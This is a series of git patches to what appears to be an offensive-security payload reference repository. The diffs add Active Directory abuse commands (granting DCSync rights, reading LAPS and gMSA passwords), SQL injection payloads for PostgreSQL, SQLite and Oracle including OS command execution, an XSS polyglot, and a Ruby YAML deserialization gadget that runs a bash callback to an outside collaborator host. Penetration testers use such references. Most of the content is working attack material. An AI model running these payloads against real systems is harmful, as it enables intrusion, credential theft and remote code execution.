/service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt ``` -Inject the TGS file and access the targeted service with the spoofed rights. +Inject the ST file and access the targeted service with the spoofed rights. ```powershell kirbikator lsa .\ticket.kirbi @@ -3161,7 +3161,7 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma ### Kerberos Unconstrained Delegation -> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html > When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. @@ -3318,7 +3318,7 @@ PS> ls \\dc01.offense.local\c$ Resource-based Constrained Delegation was introduced in Windows Server 2012. -> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html 1. Import **Powermad** and **Powerview** diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 70e1c81..35cc70a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -956,9 +956,8 @@ Example: "Windows Help and Support" (Windows + F1), search for "command prompt", Look for vuln drivers loaded, we often don't spend enough time looking at this: ```powershell -# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery - -PS C:\Users\Swissky> driverquery.exe /fo table +# Native binary +PS C:\Users\Swissky> driverquery.exe /fo table /si Module Name Display Name Driver Type Link Date ============ ====================== ============= ====================== 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM @@ -972,6 +971,7 @@ acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM +# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery PS C:\Users\Swissky> DriverQuery.exe --no-msft [+] Enumerating driver services... [+] Checking file signatures... diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 41bdb4c..37ebd0a 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -52,22 +52,22 @@ function validate_cookie($cookie,$key){ ... ``` -The $cookie variable is provided by the user. The $key variable is a secret and unknown to the user. +The `$cookie` variable is provided by the user. The $key variable is a secret and unknown to the user. -If we can make the calculated hash string Zero-like, and provide "0" in the $cookie['hmac'], the check will pass. +If we can make the calculated hash string Zero-like, and provide "0" in the `$cookie['hmac']`, the check will pass. -``` +```ps1 "0e768261251903820937390661668547" == "0" ``` We have control over 3 elements in the cookie: -- $username - username you are targeting, probably "admin" -- $hmac - the provided hash, "0" -- $expiration - a UNIX timestamp, must be in the future +- `$username` - username you are targeting, probably "admin" +- `$hmac` - the provided hash, "0" +- `$expiration` - a UNIX timestamp, must be in the future Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC. -``` +```ps1 hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49" hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4" hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b" @@ -80,8 +80,10 @@ hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e17489230 If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. -| Hash | “Magic” Number / String | Magic Hash | Found By / Description | +| Hash | "Magic" Number / String | Magic Hash | Found By / Description | | ---- | -------------------------- |:---------------------------------------------:| -------------:| +| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | +| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | @@ -106,3 +108,5 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); * [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) * [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/) * [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) +* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes) +* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html) \ No newline at end of file From dad7362da63fed5dd94b29ad5c02786664741294 Mon Sep 17 00:00:00 2001 From: CravateRouge Date: Tue, 6 Sep 2022 19:13:34 +0200 Subject: [PATCH 28/69] Update bloodyAD attacks --- .../Active Directory Attack.md | 25 ++++++++++++++++--- 1 file changed, 22 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 4848f3d..c15d1da 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -2856,10 +2856,10 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi * On Linux: ```bash # Give DCSync right to the principal identity - bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B addDomainSync user2 + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 # Remove right after DCSync - bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B delDomainSync user2 + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False ``` * WriteDACL on Group @@ -2867,6 +2867,13 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 net group "INTERESTING_GROUP" User1 /add /domain ``` + Or + ```powershell + bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp + + # Remove right + bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False + ``` #### WriteOwner @@ -2875,6 +2882,10 @@ An attacker can update the owner of the target object. Once the object owner has ```powershell Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal' ``` +Or +```powershell +bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object +``` This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group. @@ -2886,6 +2897,10 @@ An attacker can read the LAPS password of the computer account this ACE applies ```powershell Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' ``` +Or for a given computer +```powershell +bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime +``` #### ReadGMSAPassword @@ -2900,6 +2915,10 @@ $mp = $gmsa.'msDS-ManagedPassword' # Decode the data structure using the DSInternals module ConvertFrom-ADManagedPasswordBlob $mp ``` +Or +```powershell +python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword +``` #### ForceChangePassword @@ -3953,4 +3972,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) -* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) \ No newline at end of file +* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) From 8d609b1460c68fa7f4c298688684e8f0d4b791f8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 6 Sep 2022 23:15:12 +0200 Subject: [PATCH 29/69] Update README.md --- Server Side Request Forgery/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index bb0d667..3a88534 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -573,7 +573,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow http://0251.0376.0251.0376/ Dotted octal http://0251.00376.000251.0000376/ Dotted octal with padding -http://0251.254.169.254 Encode 1 octet of the IP address or 2 or 3 (Just don't encode all) +http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) ``` More urls to include From 7663594118ea2286cf7434e97880934a3f0a9283 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 7 Sep 2022 14:02:38 +0200 Subject: [PATCH 30/69] Update SQLite Injection.md --- SQL Injection/SQLite Injection.md | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 30d20b9..6355d74 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -10,8 +10,8 @@ * [Boolean - Count number of tables](#boolean---count-number-of-tables) * [Boolean - Enumerating table name](#boolean---enumerating-table-name) * [Boolean - Extract info](#boolean---extract-info) +* [Boolean - Error based](#boolean---error-based) * [Time based](#time-based) -* [Boolean error based](#boolean-error-based) * [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) * [References](#references) @@ -72,17 +72,18 @@ and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') ``` +## Boolean - Error based + +```sql +AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END +``` + ## Time based ```sql AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) ``` -## Boolean error based - -```sql -AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END -``` ## Remote Command Execution using SQLite command - Attach Database From aa89a909d178c076baf7bf5e71c10925697929ff Mon Sep 17 00:00:00 2001 From: Dhmos Funk <45040001+dhmosfunk@users.noreply.github.com> Date: Sat, 10 Sep 2022 15:56:31 +0300 Subject: [PATCH 31/69] Update PostgreSQL Injection.md --- SQL Injection/PostgreSQL Injection.md | 33 +++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index ce07cf4..72efb30 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -34,6 +34,16 @@ /**/ ``` +## PostgreSQL chain injection points symbols +```sql +; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier. +|| #or statement + +# usage examples: +/?whatever=1;(select 1 from pg_sleep(5)) +/?whatever=1||(select 1 from pg_sleep(5)) +``` + ## PostgreSQL Version ```sql @@ -140,6 +150,29 @@ Note, with the above queries, the output needs to be assembled in memory. For la ``` ## PostgreSQL Time Based +#### Identify time based + +```sql +select 1 from pg_sleep(5) +;(select 1 from pg_sleep(5)) +||(select 1 from pg_sleep(5)) +``` + +#### Database dump time based +```sql +select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1 +``` + +#### Table dump time based +```sql +select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1 +``` +#### columns dump time based +```sql +select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name limit 1 +select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name where column_name='value' limit 1 +``` + ```sql AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) From 88134256c81bbe637f05a3646838467ce56b7b09 Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Tue, 13 Sep 2022 11:58:10 +0000 Subject: [PATCH 32/69] Adding brutelogic polyglot Adding brutelogic polyglot from blog post. --- XSS Injection/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 7f69397..44b9b06 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -629,6 +629,11 @@ javascript:"/*\"/*`/*' /*<svg/onload='/*-->` ``` +Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) +```javascript +JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k +``` + ## Filter Bypass and exotic payloads ### Bypass case sensitive From c7dd67986c4ef9c7bb36710c978b3bdfc64555b1 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 13 Sep 2022 22:04:21 +0200 Subject: [PATCH 33/69] Oracle SQL --- Insecure Deserialization/Java.md | 8 ++++--- SQL Injection/HQL Injection.md | 4 +++- SQL Injection/OracleSQL Injection.md | 31 +++++++++++++++++++++++++++- 3 files changed, 38 insertions(+), 5 deletions(-) diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index 7b45d3a..71404a6 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md @@ -2,10 +2,12 @@ ## Detection -- "AC ED 00 05" in Hex -- "rO0" in Base64 +- `"AC ED 00 05"` in Hex + * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol. + * `00 05`: STREAM_VERSION. The serialization version. +- `"rO0"` in Base64 - Content-type = "application/x-java-serialized-object" -- "H4sIAAAAAAAAAJ" in gzip(base64) +- `"H4sIAAAAAAAAAJ"` in gzip(base64) ## Exploit diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 97d3672..fbb618e 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -15,6 +15,8 @@ * [Methods by DBMS](#methods-by-dbms) * [References](#references) +:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%` + ## HQL Comments ```sql @@ -134,7 +136,7 @@ public class Constants { Some usable constants in well-known Java libraries: -``` +```ps1 org.apache.batik.util.XMLConstants.XML_CHAR_APOS [ Apache Batik ] com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE [ ICU4J ] jodd.util.StringPool.SINGLE_QUOTE [ Jodd ] diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 7050267..36d0514 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -77,10 +77,37 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/ ``` -## Oracle SQL Command execution +## Oracle SQL Command Execution * [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat) +### Oracle Java Execution + +* List Java privileges + ```sql + select * from dba_java_policy + select * from user_java_policy + ``` +* Grant privileges + ```sql + exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<>','execute'); + exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); + exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); + ``` +* Execute commands + * 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()` + ```sql + SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL + SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual + ``` + * 11g R1 and R2: `DBMS_JAVA.RUNJAVA()` + ```sql + SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL + ``` + + +### Oracle Java Class + ```sql /* create Java class */ BEGIN @@ -112,3 +139,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; * [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle) * [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf) +* [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) +* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc) \ No newline at end of file From d5aed653e8dff01e15e338686954f01120b60876 Mon Sep 17 00:00:00 2001 From: Dhmos Funk <45040001+dhmosfunk@users.noreply.github.com> Date: Wed, 14 Sep 2022 18:05:31 +0300 Subject: [PATCH 34/69] Update README.md --- Request Smuggling/README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/Request Smuggling/README.md b/Request Smuggling/README.md index 3f145a0..a8dd41c 100644 --- a/Request Smuggling/README.md +++ b/Request Smuggling/README.md @@ -1,5 +1,13 @@ # Request Smuggling + +### Introduction + + + + + + ## Summary * [Tools](#tools) From b4e7add674bcce8eaa4642635dff43b8a2032b75 Mon Sep 17 00:00:00 2001 From: Dhmos Funk <45040001+dhmosfunk@users.noreply.github.com> Date: Fri, 16 Sep 2022 02:30:57 +0300 Subject: [PATCH 35/69] add simple http smuggler generator for easiest manually exploitation --- Request Smuggling/README.md | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/Request Smuggling/README.md b/Request Smuggling/README.md index a8dd41c..07b2944 100644 --- a/Request Smuggling/README.md +++ b/Request Smuggling/README.md @@ -1,13 +1,5 @@ # Request Smuggling - -### Introduction - - - - - - ## Summary * [Tools](#tools) @@ -20,6 +12,15 @@ * [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) * [Smuggler](https://github.com/defparam/smuggler) +* [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) > this tool does not offer automated exploitation. You have to identify the injection point and exploit it manually! + + +## About CL.TE | TE.CL Vulnerabilities +If you want to exploit HTTP Requests Smuggling manually you will face some problems especially in TE.CL vulnerability you have to calculate the chunk size for the second request(malicious request) as portswigger suggests `Manually fixing the length fields in request smuggling attacks can be tricky.`. For that reason you can use the [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) and exploit the CL.TE TE.CL vulnerabilities manually and learn how this vulnerability works and how you can exploit it. This tool offers you only the second request with a valid chunk size(TE.CL) auto-generated but does not offer automated exploitation. You have to identify the injection point and exploit it manually! + + + + ## CL.TE vulnerabilities From 267713c0fb6529414a9c958b8b57bb625ef76821 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 16 Sep 2022 16:37:40 +0200 Subject: [PATCH 36/69] YAML Deserialization --- .gitignore | 3 +- .../Files/PHP-Serialization-RCE-Exploit.php | 32 ------- .../Files/ruby-serialize.yaml | 19 ++++ Insecure Deserialization/Java.md | 78 +++++++++------- Insecure Deserialization/README.md | 1 + Insecure Deserialization/Ruby.md | 3 +- Insecure Deserialization/YAML.md | 89 +++++++++++++++++++ .../.htaccess_rce_files | 1 + .../Configuration Apache .htaccess/README.md | 5 ++ 9 files changed, 162 insertions(+), 69 deletions(-) delete mode 100644 Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php create mode 100644 Insecure Deserialization/Files/ruby-serialize.yaml create mode 100644 Insecure Deserialization/YAML.md create mode 100644 Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files diff --git a/.gitignore b/.gitignore index 18dcf8e..5d5f0c5 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,3 @@ BuildPDF/ .vscode -.todo -AWS Amazon Lambda/ \ No newline at end of file +.todo \ No newline at end of file diff --git a/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php b/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php deleted file mode 100644 index 8ae88db..0000000 --- a/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php +++ /dev/null @@ -1,32 +0,0 @@ - diff --git a/Insecure Deserialization/Files/ruby-serialize.yaml b/Insecure Deserialization/Files/ruby-serialize.yaml new file mode 100644 index 0000000..45da864 --- /dev/null +++ b/Insecure Deserialization/Files/ruby-serialize.yaml @@ -0,0 +1,19 @@ +--- +- !ruby/object:Gem::Installer + i: x +- !ruby/object:Gem::SpecFetcher + i: y +- !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "abc" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:Gem::RequestSet + sets: !ruby/object:Net::WriteAdapter + socket: !ruby/module 'Kernel' + method_id: :system + git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'" + method_id: :resolve \ No newline at end of file diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index 71404a6..a40b19a 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md @@ -11,7 +11,7 @@ ## Exploit -[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. +[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ```java java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin @@ -20,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 ``` -payload | author | dependencies | impact (if not RCE) -------|--------|------ |------ -BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5 -C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11 -Clojure |@JackOfMostTrades |clojure:1.8.0 -CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 -CommonsCollections1 |@frohoff |commons-collections:3.1 -CommonsCollections2 |@frohoff |commons-collections4:4.0 -CommonsCollections3 |@frohoff |commons-collections:3.1 -CommonsCollections4 |@frohoff |commons-collections4:4.0 -CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1 -CommonsCollections6 |@matthias_kaiser |commons-collections:3.1 -FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading -Groovy1 |@frohoff |groovy:2.3.9 -Hibernate1 |@mbechler| -Hibernate2 |@mbechler| -JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 -JRMPClient |@mbechler| -JRMPListener |@mbechler| -JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 -JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 -Jdk7u21 |@frohoff| -Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2 -MozillaRhino1 |@matthias_kaiser |js:1.7R2 -Myfaces1 |@mbechler| -Myfaces2 |@mbechler| -ROME |@mbechler |rome:1.0 -Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE -Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 -URLDNS |@gebl| | jre only vuln detect -Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4 +```ps1 +Payload Authors Dependencies +------- ------- ------------ +AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 +BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 +C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 +Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 +Clojure @JackOfMostTrades clojure:1.8.0 +CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 +CommonsCollections1 @frohoff commons-collections:3.1 +CommonsCollections2 @frohoff commons-collections4:4.0 +CommonsCollections3 @frohoff commons-collections:3.1 +CommonsCollections4 @frohoff commons-collections4:4.0 +CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 +CommonsCollections6 @matthias_kaiser commons-collections:3.1 +CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 +FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 +Groovy1 @frohoff groovy:2.3.9 +Hibernate1 @mbechler +Hibernate2 @mbechler +JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 +JRMPClient @mbechler +JRMPListener @mbechler +JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 +JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 +Jdk7u21 @frohoff +Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 +MozillaRhino1 @matthias_kaiser js:1.7R2 +MozillaRhino2 @_tint0 js:1.7R2 +Myfaces1 @mbechler +Myfaces2 @mbechler +ROME @mbechler rome:1.0 +Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE +Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 +URLDNS @gebl +Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 +Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 +``` ## Burp extensions using ysoserial @@ -69,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api: - [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution ```java -java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] +$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] +$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 where -a - generates/tests all payloads for that marshaller @@ -101,10 +109,12 @@ Payload generators for the following marshallers are included:
